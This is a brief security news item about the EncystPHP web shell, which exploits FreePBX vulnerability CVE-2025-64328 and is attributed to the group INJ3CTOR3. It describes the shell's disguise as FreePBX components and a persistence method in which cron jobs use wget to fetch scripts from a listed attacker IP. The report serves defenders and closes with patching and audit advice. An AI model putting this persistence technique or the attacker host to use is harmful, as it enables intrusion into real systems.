FORTIGUARD Labs has dubbed the EncystPHP web shell, a sophisticated piece of malware that targets FreePBX environments by exploiting a post-authentication command-injection vulnerability, CVE-2025-64328, to establish a persistent backdoor. The attacks began in early December, with the campaign described as using a web shell capable of remote command execution, persistence, and deployment of the shell itself.
The activity is linked to the hacker group INJ3CTOR3, according to FortiGuard Labs, which has a history of targeting VoIP systems. In one documented case, the exploit originated in Brazil and affected an Indian technology company specialising in cloud and communication services, with Cron-style persistence using wget to download scripts from an external IP (45.234.176[.]202).
EncystPHP is designed to blend in by mimicking legitimate FreePBX components, allowing it to evade detection while giving attackers control over the victim system. Administrators are urged to patch unpatched PBX systems and audit for EncystPHP shells or unauthorized cron jobs, as the incident underscores ongoing exploitation of CVE-2025-64328.